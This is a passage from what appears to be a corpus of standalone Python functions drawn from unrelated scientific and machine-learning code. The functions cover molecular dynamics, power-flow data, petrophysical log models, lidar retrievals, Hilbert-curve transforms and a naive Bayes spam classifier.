[ntrials*(nmaps+trlen),edim]\n explicit loop required for flatten and embedd x_input\n because if switchmaps=1, matrix is resorted between trials\n and therefore same stimulus token integers correspond to\n different stimulus embeddings on different trials\n '''\n s_input = -np.ones([ntrials,(self.nmaps+trlen),self.stimdim])\n for trialn,x_input_trial in enumerate(x_input): \n if self.switchmaps: self.resort_emat()\n s_input[trialn] = self.emat[x_input_trial]\n # format output\n i_input = tr.unsqueeze(tr.LongTensor(i_input),1)\n s_input = tr.unsqueeze(tr.Tensor(np.concatenate(s_input)),1)\n yseq = tr.unsqueeze(tr.LongTensor(x_input.reshape(-1)),1)\n return i_input,s_input,yseq", "def gen_ep_data(self,ntrials,trlen):\n ## instruction\n # for each trial, generate random instruction encoding sequence\n i_encoding_input = np.array([\n np.random.permutation(np.arange(1,self.nmaps+1)) \n for i in range(ntrials)\n ])\n i_test_input = np.zeros([ntrials,trlen])\n i_input = np.concatenate([\n i_encoding_input,i_test_input],\n 1).astype(int).reshape(-1) # (ntrials,trlen+)\n ## stimulus\n x_encoding_input = i_encoding_input\n x_test_input = np.random.randint(1,self.nmaps+1,[ntrials,trlen])\n x_input = np.concatenate([i_encoding_input,x_test_input],1)\n ''' \n embed x_input: \n [ntrials,nmaps+trlen] -> s_input [ntrials*(nmaps+trlen),edim]\n explicit loop required for flatten and embedd x_input\n because if switchmaps=1, matrix is resorted between trials\n and therefore same stimulus token integers correspond to\n different stimulus embeddings on different trials\n '''\n s_input = -np.ones([ntrials,(self.nmaps+trlen),self.stimdim])\n for trialn,x_input_trial in enumerate(x_input): \n if self.switchmaps: self.resort_emat()\n s_input[trialn] = self.emat[x_input_trial]\n \n # format output\n i_input = tr.unsqueeze(tr.LongTensor(i_input),1)\n s_input = tr.unsqueeze(tr.Tensor(np.concatenate(s_input)),1)\n yseq = tr.unsqueeze(tr.LongTensor(x_input.reshape(-1)),1)\n if return_trial_flag:\n tr_flag = np.concatenate([i*np.ones(self.nmaps+trlen) for i in range(ntrials)])\n tr_flag = tr.unsqueeze(tr.LongTensor(tr_flag),1)\n return tr_flag,i_input,s_input,yseq,\n else:\n return i_input,s_input,yseq", "def calibration(N,kb,T,Ekinv,V):\n lamb = np.sqrt((N-1)*3*kb*T/(Ekinv*2))\n \n if lamb < 0.9999:\n V = lamb*V\n elif lamb>1.0001:\n V = lamb*V\n \n return V", "def simulating_verlet(n,N,D,t,Rv,sigma,epsilon,dt,m,T,dim,kb,V,steps_r):\n Ekinv = np.zeros((n,1))\n Epotv = np.zeros((n,1))\n Ev = np.zeros((n,1))\n Gpc = np.zeros((steps_r,n))\n for k in range(len(t)):\n F = particle_forceV(Rv[-1], N, sigma, epsilon, D)\n Rv.append(particle_positionV(copy.deepcopy(Rv[-1]), V, dt, F, D)) \n V = particle_velocityV(V, F, dt, Rv, sigma, epsilon, D, N)\n Ekinv[k] = np.sum(1/(2*m)*(V**2))\n \n #Calibration\n if (int(k%(10)) == int(0) & int(k)<int(len(t)/2)):\n V = calibration(N, kb,T,Ekinv[k],V)\n Ekinv[k] = np.sum(1/(2*m)*(V**2))\n if int(k)> int(len(t)-50):\n Gpc[:,k], dist, dr = pair_correlation(N,Rv[-1],D,steps_r)\n Uv = particle_LJV(Rv[-1], N, D) \n Epotv[k] = abs(Uv)/2 \n Ev[k] = Ekinv[k]+Epotv[k]\n return Rv, Ekinv, Epotv, Ev, Gpc", "def e_step(self):\n # update VMF probabilities (Equation (3))\n logP = np.dot(self.features, self.mu.T)*self.kappa + np.log(self.pi).reshape(1,-1) # n by k\n logP_norm = logP - logsumexp(logP, axis=1).reshape(-1,1)\n self.p = np.exp(logP_norm)\n self.mllk = np.mean(logsumexp(logP, axis=1))", "def case():\r\n #ppc = {\"version\": '2'}\r\n ppc = {}\r\n ##----- Power Flow Data -----##\r\n ## system MVA base\r\n ppc[\"baseMVA\"] = 100.0\r\n\r\n ## bus data\r\n # bus_i type Pd Qd Gs Bs area Vm Va baseKV zone Vmax Vmin\r\n ppc[\"bus\"] = array([\r\n [1, 3, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [2, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [3, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [4, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [5, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [6, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [7, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [8, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [9, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [10, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [11, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [12, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [13, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [14, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [15, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [16, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0]\r\n ])\r\n\r\n ## generator data\r\n # bus, Pg, Qg, Qmax, Qmin, Vg, mBase, status, Pmax, Pmin, Pc1, Pc2,\r\n # Qc1min, Qc1max, Qc2min, Qc2max, ramp_agc, ramp_10, ramp_30, ramp_q, apf\r\n ppc[\"gen\"] = array([\r\n [1,\t0,\t0,\t10,\t-10,\t1.0224,\t100,\t1,\t10,\t-10,\t0,\t0,\t0,\t0,\t0,\t0,\t0,\t0,\t0,\t0, 0, 0,0, 0, 0],\r\n [3 ,0, 0, 50e-3, -50e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [5 , 0, 0, 10e-3, -10e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [10 , 0, 0, 10e-3, -10e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [13 ,0, 0, 10e-3, -10e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [15 , 0, 0, 50e-3, -50e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0]\r\n ])\r\n load_b = array([2, 4, 9, 12, 14])\r\n ppc[\"bus\"][load_b, 2] = multiply(array([-2.1125, -0.2231, -0.1664, -0.0719, -1.4633]).T, 0.03)\r\n ppc[\"bus\"][load_b, 3] = multiply(array([1.6492, 0.4054, 0.8599, 0.8845, 0.6778]).T, 0.03)\r\n ## branch data\r\n # fbus, tbus, r, x, b, rateA, rateB, rateC, ratio, angle, status, angmin, angmax\r\n ppc[\"branch\"] = array([\r\n [1, 2, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [1, 8, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [1, 15, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [2, 3, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [2, 6, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [2, 7, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [3, 4, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [4, 5, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [8, 9, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [8, 12, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [8, 13, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [9, 10, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [9, 14, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [10, 11, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [15, 16, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0]\r\n ])\r\n R1 = 0.43\r\n L1 = 0.4e-3\r\n RS1 = 0.32\r\n LS1 = 0.39e-3\r\n Zbase = (0.4*0.4/100)\r\n branch_phase =array([\r\n [1, 1, 2, 188, R1, L1],\r\n [2, 1 ,8, 346, R1, L1],\r\n [3 ,1 ,15,501, R1 ,L1],\r\n [4, 2, 3, 130, RS1,LS1],\r\n [5, 2, 6, 145, RS1,LS1],\r\n [6, 2 ,7, 157, RS1,LS1],\r\n [7, 3, 4, 185, RS1,LS1],\r\n [8, 4, 5, 1000,RS1,LS1],\r\n [9, 8 ,9, 416, RS1,LS1],\r\n [10,8 ,12,130, RS1,LS1],\r\n [11,8 ,13,121, RS1,LS1],\r\n [12,9 ,10,130, RS1,LS1],\r\n [13,9 ,14,127, RS1,LS1],\r\n [14,10,11,251, RS1,LS1],\r\n [15,15,16,345, RS1,LS1]\r\n ])\r\n ppc[\"branch\"][:, [2,3]] = multiply(array([branch_phase[:, 4]*branch_phase[:, 3], branch_phase[:, 4]*branch_phase[:, 4]*100*pi]).T,0.001/Zbase)\r\n\r\n ##----- OPF Data -----##\r\n ## area data\r\n # area refbus\r\n\r\n\r\n ## generator cost data\r\n # 1 startup shutdown n x1 y1 ... xn yn\r\n # 2 startup shutdown n c(n-1) ... c0\r\n\r\n\r\n return ppc", "def E_Dynamic_MavkoEtAl2009(rhob,DTS,PR):\n E = (2*(rhob*1000)*((304800/DTS)**2)*(1+PR))/1000000\n return E", "def createCNDTransEmiProb(self, qtc_type='qtcc'):\n \n if qtc_type == 'qtcb':\n state_num = 11\n elif qtc_type == 'qtcc':\n state_num = 83\n elif qtc_type == 'qtcbc':\n state_num = 92\n else:\n raise(QtcException(\"createCNDTransEmiProb: Unknow qtc type: {!r}\".format(qtc_type)))\n \n qtc = []\n \n if qtc_type == 'qtcb':\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n qtc.append([i-2, j-2])\n elif qtc_type == 'qtcc':\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n for k in xrange(1, 4):\n for l in xrange(1, 4):\n qtc.append([i-2, j-2, k-2, l-2])\n elif qtc_type == 'qtcbc':\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n qtc.append([i-2, j-2, np.NaN, np.NaN])\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n for k in xrange(1, 4):\n for l in xrange(1, 4):\n qtc.append([i-2, j-2, k-2, l-2])\n else:\n raise(QtcException(\"createCNDTransEmiProb: Unknow qtc type: {!r}\".format(qtc_type)))\n \n qtc = np.array(qtc)\n #np.savetxt('/home/cdondrup/qtc.csv', qtc, delimiter=',', fmt='%1f')\n \n trans = np.zeros((state_num, state_num))\n for i1 in xrange(qtc.shape[0]):\n for i2 in xrange(i1+1, qtc.shape[0]):\n trans[i1+1, i2+1] = np.nanmax(np.absolute(qtc[i1]-qtc[i2])) != 2\n if trans[i1+1, i2+1] == 1:\n for j1 in xrange(qtc.shape[1]-1):\n for j2 in xrange(j1+1, qtc.shape[1]):\n if sum(np.absolute(qtc[i1, [j1, j2]])) == 1 \\\n and sum(np.absolute(qtc[i2, [j1, j2]])) == 1:\n if np.nanmax(np.absolute(qtc[i1, [j1, j2]]-qtc[i2, [j1, j2]])) > 0 \\\n and sum(qtc[i1, [j1, j2]]-qtc[i2, [j1,j2]]) != 1:\n trans[i1+1, i2+1] = 5\n break\n if trans[i1+1, i2+1] != 1:\n break\n trans[i2+1, i1+1] = trans[i1+1, i2+1]\n \n trans[trans != 1] = 0\n #np.savetxt('/home/cdondrup/trans.csv', np.rint(trans).astype(int), delimiter=',', fmt='%i')\n trans[trans == 0] = 0.00001\n trans[0] = 1\n trans[:, 0] = 0\n trans[:, -1] = 1\n trans[0, -1] = 0\n trans[-1] = 0\n trans += np.dot(np.eye(state_num), 0.00001)\n trans[0, 0] = 0\n \n trans = trans / trans.sum(axis=1).reshape(-1, 1)\n #np.savetxt('/home/cdondrup/trans.csv', trans, delimiter=',')\n \n emi = np.eye(state_num)\n emi[emi == 0] = 0.0001\n \n return trans, emi", "def test_inu(self):\n lmax = 3\n x = np.array([5000])\n result_i, result_k = bessel_sk.lniknu(x, lmax)\n pih = np.log(0.5*np.pi)\n expP = (1+np.exp(-2*x))\n expM = (1-np.exp(-2*x))\n expected_i = np.array([\n -np.log(2*x**1) + x + np.log(expM),\n -np.log(2*x**2) + x + np.log(expM*(x+1)+x-1),\n -np.log(2*x**3) + x + np.log((3+x**2)*expM-3*x*expP),\n -np.log(2*x**4) + x + np.log((15*x+x**3)*expP-(15+6*x**2)*expM) \n ])\n expected_k = np.array([pih -x - 1*np.log(x),\n pih -x - 2*np.log(x) + np.log(x+1),\n pih -x - 3*np.log(x) + np.log(x**2+3*x+3),\n pih -x - 4*np.log(x) + np.log(x**3+6*x**2+15*x+15)\n ])\n assert_almost_equal(result_i[0]/expected_i.T, 1, decimal=4)\n assert_almost_equal(result_k[0]/expected_k.T, 1, decimal=4)", "def TMM(x,N,n,trun_basis):\n Mat = np.zeros([len(trun_basis),len(trun_basis)])\n print('making TMM')\n perms = [int((x**n * iii)%N) for iii in trun_basis] # Modular multiplication\n for iii in range(len(trun_basis)):\n if trun_basis.__contains__(perms[iii]):\n Mat[iii,trun_basis.index(perms[iii])] = 1\n return Mat", "def TR_algo7(self, p):\n h = 0\n ve = 0\n vd = self._vd\n m = max(self._compact_M)\n for i in range(m-1, -1, -1):\n mu = self.extract_mask(i)\n mu_norm = sum([bit_component(mu, j) for j in range(self._N)])\n mu = rotate_right(mu, vd+1)\n pi = rotate_right(ve, vd+1) & ((~mu) & 2**self._N-1)\n l = [bit_component(px, i) for px in p]\n # 2. construct a integer whose bits are given by l\n l = sum( [lx*2**j for j, lx in enumerate(l)] )\n l = T(ve, vd, l)\n w = inverse_gc(l)\n r = gcr(w, mu, pi)\n ve = ve ^ rotate_left(e(w), vd+1)\n vd = (vd + d(w) + 1) % self._N\n h = (h << mu_norm) | r\n return h", "def OxygenTransmission(T,P,n_wv,wavelength,dr,freq_lim=np.array([lp.c/770e-9,lp.c/768e-9]),sim_nu=np.array([]),spec_file=''):\n # fraction of O2 by number density\n fO2 = (32*0.2320+28.02*0.7547+44.01*0.00046+39.94*0.0128+20.18*0.000012+4.0*0.0000007+83.8*0.000003+131.29*0.00004)*0.2320/32.0\n \n if len(spec_file) == 0:\n spec_file = '/Users/mhayman/Documents/DIAL/O2_HITRAN2012_760_781.txt'\n \n if sim_nu.size==0:\n sim_nu = np.arange(-3e9,3e9,20e6)\n \n# inu0 = np.argmin(np.abs(sim_nu)) # index to center of frequency array\n \n n_o2=fO2*(P/(lp.kB*T)-n_wv) # to convert atm to Pa use *101325\n ext_o2 = rb.ExtinctionFromHITRAN(lp.c/wavelength+sim_nu,T,P,(mO2*1e-3)/lp.N_A,nuLim=freq_lim,freqnorm=True,filename=spec_file).T\n T_o2 = np.exp(-np.cumsum(n_o2[np.newaxis,:]*ext_o2,axis=1)*dr)\n \n return T_o2,sim_nu", "def ORM1(RHOB,PHIN,DTCO,RD,Dw,HIw,DTw,Rw,Df,HIf,DTf,Rf,Da,HIa,DTa,Ra,Dc1,HIc1,DTc1,PHIc1,Rc1,Dc2,HIc2,DTc2,PHIc2,Rc2,Dc3,HIc3,DTc3,PHIc3,Rc3,Ck,Dk,HIk,DTk,PHIk,Rk,RSK,Cwv,Ckv,Alpha,Sxoe):\n#\n# 5.1.1 Initialise Outputs & Check for missing values in inputs:\n# --------------------------------------------------------------\n\tPHIt=MissingValue\n\tPHIe=MissingValue\n\tCBW=MissingValue\n\tBVW=MissingValue\n\tHCPV=MissingValue\n\tVf=MissingValue\n\tVs=MissingValue\n\tSwt=MissingValue\n\tSwe=MissingValue\n\tVc1=MissingValue\n\tVc2=MissingValue\n\tVc3=MissingValue\n\tVk=MissingValue\n\tToc=MissingValue\n\tQc=MissingValue\n\tGDen=MissingValue\n\tif MissingValue in (RHOB,PHIN,DTCO,RD,Dw,HIw,DTw,Rw,Df,HIf,DTf,Rf,Da,HIa,DTa,Ra,Dc1,HIc1,DTc1,PHIc1,Rc1,Dc2,HIc2,DTc2,PHIc2,Rc2,Dc3,HIc3,DTc3,PHIc3,Rc3,Ck,Dk,HIk,DTk,PHIk,Rk,RSK,Cwv,Ckv,Alpha,Sxoe):\n\t\treturn PHIt,PHIe,CBW,BVW,HCPV,Vf,Vs,Swt,Swe,Vc1,Vc2,Vc3,Vk,Toc,Qc,GDen\n#\n# 5.1.2 Initialise parameters:\n# ----------------------------\n#\t5.1.2.1 Initialise Interation Control Paramaeters:\n#\t--------------------------------------------------\n\tNIter=0\n\tNIterMax=100\n\tErrIter=10000\n\tTolErrIter=0.0001\n\tIterEnd=0\n#\n#\t5.1.2.2 Initialise Volumes and Hydrocarbon Properties:\n#\t------------------------------------------------------\n\tVk=0.000 # Volume of kerogen initialised to zero\n\tVa=0.000 # Volume of adsorbed gas initialised to zero\n\tVf=0.000 # Volume of free gas initialised to zero\n#\n#\t5.7.3 Start interative loop:\n#\t-----------------------------\n\twhile IterEnd==0:\n#\n# 5.7.3.1 Compute Pore Fluid Properties:\n# --------------------------------------\n\t\tSum=Va+Vf\n\t\tif(Sum==0):\n\t\t\tDh=Df\n\t\t\tHIh=HIf\n\t\t\tDTh=DTf\n\t\telse:\n\t\t\tDh=(Va*Da+Vf*Df)/Sum\n\t\t\tHIh=(Va*HIa+Vf*HIf)/Sum\n\t\t\tDTh=(Va*DTa+Vf*DTf)/Sum\n\t\tDpf=(Sxoe*Dw)+(1-Sxoe)*Dh # Density of pore fluid\n\t\tHIpf=(Sxoe*HIw)+(1-Sxoe)*HIh # Hydrogen Index of pore fluid\n\t\tDTpf=(Sxoe*DTw)+(1-Sxoe)*DTh # DT of pore fluid\t\n#\n#\t5.7.3.2 Matrix Inversion:\n#\t-------------------------\n\t\tYMatrix = [RHOB,PHIN,DTCO,1] # Populate YMatrix\n\t\tAMatrix = [[Dc1,Dc2,Dk,Dpf],[HIc1,HIc2,HIk,HIpf],[DTc1,DTc2,DTk,DTpf],[1,1,1,1]] # Populate AMatrix\n\t\tXMatrix,Qc=SolveAndCorrect(AMatrix,YMatrix) # Solve for XMatrix\n\t\tVc1=XMatrix[0] # Volume of component 1\n\t\tVc2=XMatrix[1] # Volume of component 2\n\t\tVc3=0.000 # Volume of component 3 (not calculated in this routine).\n\t\tVk=XMatrix[2] # Volume of organic component\n\t\tPHIe=XMatrix[3] # Volume of hydrocarbon in organic and inorganic pores\n#\n#\t5.7.3.3 Determine Total & Effective Water Saturations:\n#\t-----------------------------------------------------\n\t\tPHIm=(Vc1*PHIc1)+(Vc2*PHIc2)+(Vc3*PHIc3) # Compute Micro Porosity\n\t\tPHIt=PHIm+PHIe\n\t\tSwe=fConnectivityModel(RD,Vc1,Vc2,Vc3,Vk,PHIe,Rc1,Rc2,Rc3,Rk,Rw,Rf,Cwv,Ckv,Alpha)\n\t\tif(PHIt==0):\n\t\t\tSwt=1.000\n\t\telse:\n\t\t\tSwt=(PHIm+PHIe*Swe)/PHIt\n#\n#\t5.7.4.3 Compute Volume of Adsorbed and Free Gas:\n#\t------------------------------------------------\n\t\tVa=RSK*Vk # Volume of adsorbed gas in organic pores\n\t\tHCPV=PHIt*(1-Swt)\n\t\tif(Va>=HCPV):\n\t\t\tVa=HCPV\n\t\tVf=HCPV-Va # Volume of free gas\t\n#\n# 5.4.4 Test for interative computations:\n# ---------------------------------------\n\t\tNIter=NIter+1\n\t\tif(NIter>=NIterMax):\n\t\t\tIterEnd=1\n\t\telse:\t\t\t\n\t\t\tif(NIter<=2):\n\t\t\t\tResultOld=[1,1,1,1,1,1,1,1,1] # Initial Setting\n\t\t\t\tResultNew=[Vc1,Vc2,Vc3,Vk,Va,Vf,PHIe,Swt,Swe] # Current Results\n\t\t\t\tErrIter=ComputeMatrixDifference(ResultOld,ResultNew)\n\t\t\t\tResultOld=ResultNew\n\t\t\telse:\n\t\t\t\tResultNew=[Vc1,Vc2,Vc3,Vk,Va,Vf,PHIe,Swt,Swe] # Current Results\n\t\t\t\tErrIter=ComputeMatrixDifference(ResultOld,ResultNew)\n\t\t\t\tResultOld=ResultNew\n\t\t\t\tif(ErrIter<=TolErrIter):\n\t\t\t\t\tIterEnd=1\n#\n# 5.4.6 Preoutput computations:\n# ------------------------------\n\tCBW=PHIm # The assumption is that all microporosity can be considered to be clay bound water.\n\tBVW=PHIe*Swe # Bulk volume of water\n\tHCPV=PHIt*(1-Swt) # Hydrocarbon pore volume\t\n\tToc=fToc_Wtf(Vc1,Vc2,Vc3,Vk,0,Ck,Dc1,Dc2,Dc3,Dk,Dw) # TOC-wt fraction. Note: Vrw=0 in fToc_Wtf(Vc1,Vc2,Vc3,Vk,Vrw,Ck,Dc1,Dc2,Dc3,Dk,Dw) # Total Organic Carbon wt%\n\tGDen=fOrmGDen(Vc1,Vc2,Vc3,Vk,0,Dc1,Dc2,Dc3,Dk,Dw) # Grain Density. Note: Vrw=0 in fOrmGDen(Vc1,Vc2,Vc3,Vk,Vrw,Dc1,Dc2,Dc3,Dk,Dw) # Grain Density g/cm3\n#\n# 5.4.7 Output Results:\n# \t-------------------\n\treturn PHIt,PHIe,CBW,BVW,HCPV,Vf,Va,Swt,Swe,Vc1,Vc2,Vc3,Vk,Toc,Qc,GDen", "def TR_algo8(self, h):\n ve = 0\n vd = self._vd\n k = 0\n p = [0,]*self._N\n m = max(self._compact_M)\n vM = sum(self._compact_M)\n for i in range(m-1, -1, -1):\n mu = self.extract_mask(i)\n mu_norm = sum([bit_component(mu, j) for j in range(self._N)])\n mu = rotate_right(mu, vd+1)\n pi = rotate_right(ve, vd+1) & (~mu & 2**self._N-1)\n r = [bit_component(h, vM - k - (j+1)) for j in range(mu_norm)][::-1]\n r = sum( [rx*2**j for j, rx in enumerate(r)] )\n k = k + mu_norm\n w = gcr_inv(r, mu, pi)\n l = gc(w)\n l = T_inv(ve, vd, l)\n for j in range(self._N):\n p[j] |= bit_component(l, j) << i\n ve = ve ^ (rotate_left(e(w), vd+1))\n vd = (vd + d(w) + 1) % self._N\n return p", "def TDErrorFunction(Prof,x,Trx,rb_spec,abs_spec,dr,inu0,bsrMult,base_T,base_P,r0,lam=[0,0,0,0,0,0]):\n \n iR = Prof['WV Online'].size # range index for a profile into 1D x array\n x2 = np.reshape(x,(iR+1,6))\n xK = x2[0,:] # constants [HSRL Mol HSRL Comb, WV On, WV Off, O2 On ,O2 Off]\n xS = x2[1:,:] # state vector [T, nWV, BSR, phi_HSRL, phi_WV, phi_O2]\n \n # HSRLProfile(T,BSR,phi,rb_spec,Trx,inu0,K,base_T,base_P)\n HSRL_mol = HSRLProfile(xS[:,0],xS[:,2],xS[:,3],rb_spec['HSRL'],Trx['HSRL Mol'],inu0['HSRL'],xK[0],base_T,base_P)+Prof['HSRL Mol BG']\n HSRL_comb = HSRLProfile(xS[:,0],xS[:,2],xS[:,3],rb_spec['HSRL'],Trx['HSRL Comb'],inu0['HSRL'],xK[1],base_T,base_P)+Prof['HSRL Comb BG']\n \n# WVDIALProfile(T,nWV,BSR,phi,rb_spec,abs_spec,Trx,inu0,K,base_T,base_P,dr)\n WV_on = WVDIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['WV'],xS[:,4],rb_spec['WV Online'],abs_spec['WV Online'],Trx['WV Online'],inu0['WV Online'],xK[2],base_T,base_P,dr,r0)+Prof['WV Online BG']\n WV_off = WVDIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['WV'],xS[:,4],rb_spec['WV Offline'],abs_spec['WV Offline'],Trx['WV Offline'],inu0['WV Offline'],xK[3],base_T,base_P,dr,r0)+Prof['WV Offline BG']\n\n# O2DIALProfile(T,nWV,BSR,phi,rb_spec,abs_spec,Trx,inu0,K,base_T,base_P,dr)\n O2_on = O2DIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['O2'],xS[:,5],rb_spec['O2 Online'],abs_spec['O2 Online'],Trx['O2 Online'],inu0['O2 Online'],xK[4],base_T,base_P,dr,r0)+Prof['O2 Online BG']\n O2_off = O2DIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['O2'],xS[:,5],rb_spec['O2 Offline'],abs_spec['O2 Offline'],Trx['O2 Offline'],inu0['O2 Offline'],xK[5],base_T,base_P,dr,r0)+Prof['O2 Offline BG']\n \n# # Optimization error. T is piecewise\n# OptError = np.nansum(HSRL_mol-(Prof['HSRL Mol'])*np.log(HSRL_mol)) \\\n# +np.nansum(HSRL_comb-(Prof['HSRL Comb'])*np.log(HSRL_comb)) \\\n# +np.nansum(WV_on-(Prof['WV Online'])*np.log(WV_on)) \\\n# +np.nansum(WV_off-(Prof['WV Offline'])*np.log(WV_off)) \\\n# +np.nansum(O2_on-(Prof['O2 Online'])*np.log(O2_on)) \\\n# +np.nansum(O2_off-(Prof['O2 Offline'])*np.log(O2_off)) \\\n# +lam[0]*np.nansum(np.abs(np.diff(xS[:,0]))) \\\n# +lam[1]*np.nansum(np.abs(np.diff(xS[:,1]))) \\\n# +lam[2]*np.nansum(np.abs(np.diff(xS[:,2]))) \\\n# +lam[3]*np.nansum(np.abs(np.diff(xS[:,3]))) \\\n# +lam[4]*np.nansum(np.abs(np.diff(xS[:,4]))) \\\n# +lam[5]*np.nansum(np.abs(np.diff(xS[:,5]))) \n \n # Optimization error. T is piecewise slope\n OptError = np.nansum(HSRL_mol-(Prof['HSRL Mol'])*np.log(HSRL_mol)) \\\n +np.nansum(HSRL_comb-(Prof['HSRL Comb'])*np.log(HSRL_comb)) \\\n +np.nansum(WV_on-(Prof['WV Online'])*np.log(WV_on)) \\\n +np.nansum(WV_off-(Prof['WV Offline'])*np.log(WV_off)) \\\n +np.nansum(O2_on-(Prof['O2 Online'])*np.log(O2_on)) \\\n +np.nansum(O2_off-(Prof['O2 Offline'])*np.log(O2_off)) \\\n +lam[0]*np.nansum(np.abs(np.diff(np.diff(xS[:,0])))) \\\n +lam[1]*np.nansum(np.abs(np.diff(xS[:,1]))) \\\n +lam[2]*np.nansum(np.abs(np.diff(xS[:,2]))) \\\n +lam[3]*np.nansum(np.abs(np.diff(xS[:,3]))) \\\n +lam[4]*np.nansum(np.abs(np.diff(xS[:,4]))) \\\n +lam[5]*np.nansum(np.abs(np.diff(xS[:,5])))\n \n return OptError", "def cal_et(self):\r\n\r\n for ind in range(2**(4*self.k)):\r\n i=0\r\n num = int(bin(ind)[2:])\r\n aux = listarNum(num)\r\n list_num=np.array([])\r\n while i < 4*self.k:\r\n if len(aux) < 4*self.k-i:\r\n list_num=np.append(list_num, [0.])\r\n elif len(aux)==4*self.k-i:\r\n list_num=np.append(list_num, aux)\r\n i=i+1\r\n \"\"\"\r\n reversed_list_num = list_num[::-1]\r\n self.et[ind]=reversed_list_num\r\n \"\"\"\r\n self.et[ind]=list_num", "def testingPhase(SP, HP):\n classification= {}\n TP, TN, FP, FN = 0,0,0,0\n\n pullData = open(\"labels\", \"r\").read()\n dataArray= pullData.split('\\n')\n dataArrayTest=dataArray[21301:-1] #opens files from folder 070 onwards \n \n for eachLine in dataArrayTest:\n kind,file = eachLine.split(' ')\n print(file,kind)\n if (kind == \"spam\"):\n SO = 1 #initially stating that it is a spam not a ham\n HO = 0\n elif (kind== \"ham\"):\n HO = 1\n SO = 0\n file=file.strip('../') \n fileDir = os.path.dirname(os.path.realpath('__file__'))\n filepath = os.path.join(fileDir,file) \n email=\"\"\n fh = open(filepath, encoding=\"ascii\", errors=\"ignore\")\n for line in fh:\n email += line\n fh.close()\n email= email.lower()\n email_words = processText(contentEmail(email))\n email_words = tuple(email_words)\n spam_ba= math.log(PS,10) #initially contains value of Spam Probability\n ham_ba= math.log(PH, 10) #initially contains value of Ham Probability\n\n\n \"\"\"BAYES THEOREM\"\"\"\n for word, value in SP.items(): \n if word in email_words:\n x = math.log(value, 10)\n spam_ba += x\n else:\n x 